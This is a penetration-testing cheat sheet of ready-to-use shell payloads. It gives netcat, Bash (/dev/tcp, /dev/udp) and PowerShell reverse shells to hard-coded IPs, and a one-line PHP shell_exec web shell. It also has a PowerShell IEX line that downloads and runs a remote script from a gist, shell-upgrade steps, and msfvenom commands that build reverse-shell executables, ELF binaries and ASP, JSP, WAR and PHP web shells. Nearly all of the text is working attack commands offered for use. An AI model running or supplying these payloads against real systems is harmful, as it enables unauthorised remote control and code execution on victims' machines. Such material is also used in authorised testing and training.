Build Space
Basic reverse shell
Using netcat to get a reverse shell (note: netcat is rarely going to be present on enterprise/production systems):
nc -e /bin/sh 10.10.10.200 8888
or /bin/sh | nc 10.10.10.200 8888
& listening for it to catch it:nc -lvnp 8888
Switches:-l | listen mode, for inbound connections
-v | verbose
-n | numeric-only IP addresses, not DNS.
-p | local port number
Simple PHP web shell
If we can upload a file onto a target web server, or edit an existing file, this is a very simple shell:
<?php echo shell_exec($_GET['cmd']); ?>
Visit the uploaded file to use it for system commands:
http://<target>/webshell.php?cmd=<commands>
Upgrading shells
Using Python:
python -c 'import pty; pty.spawn("/bin/bash")'
Using stty:
# In reverse shell
$ python -c 'import pty; pty.spawn("/bin/bash");'
Ctrl-Z
# In terminal
$ stty raw -echo
$ fg
# In reverse shell
$ reset
$ export SHELL=bash
$ export TERM=xterm-256color
$ stty rows <num> columns <cols>
Bash TCP
$ bash -i >& /dev/tcp/10.0.0.1/4242 0>&1
$ 0<&196;exec 196<>/dev/tcp/10.0.0.1/4242; sh <&196 >&196 2>&19
Bash UDP
# Victim
$ sh -i >& /dev/udp/10.10.10.1/8888 0>&1
# Listener
$ nc -u -lvp 8888
Powershell
powershell -NoP -NonI -W Hidden -Exec Bypass -Command New-Object System.Net.Sockets.TCPClient("10.0.0.1",4242);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()
powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('10.0.0.1',4242);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"
powershell IEX (New-Object Net.WebClient).DownloadString('https://gist.githubusercontent.com/staaldraad/204928a6004e89553a8d3db0ce527fd5/raw/fe5f74ecfae7ec0f2d50895ecf9ab9dafe253ad4/mini-reverse.ps1')
Msfvenom Payloads (non-meterpreter)
Windows Staged reverse TCP
msfvenom -p windows/shell/reverse_tcp LHOST=<lhost> LPORT=<lport> -f exe > shell-x86.exe
msfvenom -p windows/x64/shell_reverse_tcp LHOST=<lhost> LPORT=<lport> -f exe > shell-x64.exe
Windows Stageless Payloads
msfvenom -p windows/shell_reverse_tcp LHOST=<lhost> LPORT=<lport> -f exe > shell-x86.exe
Staged Payloads for Linux
x86 | msfvenom -p linux/x86/shell/reverse_tcp LHOST=<lhost> LPORT=<lport> -f elf > shell-x86.elf
x64 | msfvenom -p linux/x64/shell/reverse_tcp LHOST=<lhost> LPORT=<lport> -f elf > shell-x64.elf
Stageless Payloads for Linux
x86 | msfvenom -p linux/x86/shell_reverse_tcp LHOST=<lhost> LPORT=<lport> -f elf > shell-x86.elf
x64 | msfvenom -p linux/x64/shell_reverse_tcp LHOST=<lhost> LPORT=<lport> -f elf > shell-x64.elf
Web Shells
asp | msfvenom -p windows/shell/reverse_tcp LHOST=<lhost> LPORT=<lport> -f asp > shell.asp
jsp | msfvenom -p java/jsp_shell_reverse_tcp LHOST=<lhost> LPORT=<lport> -f raw > shell.jsp
WAR shell: if we have access to a Tomcat server’s mgmt interface, we can upload a WAR file | msfvenom -p java/jsp_shell_reverse_tcp LHOST=<lhost> LPORT=<lport> -f war > shell.war
php | msfvenom -p php/reverse_php LHOST=<lhost> LPORT=<lport> -f raw > shell.php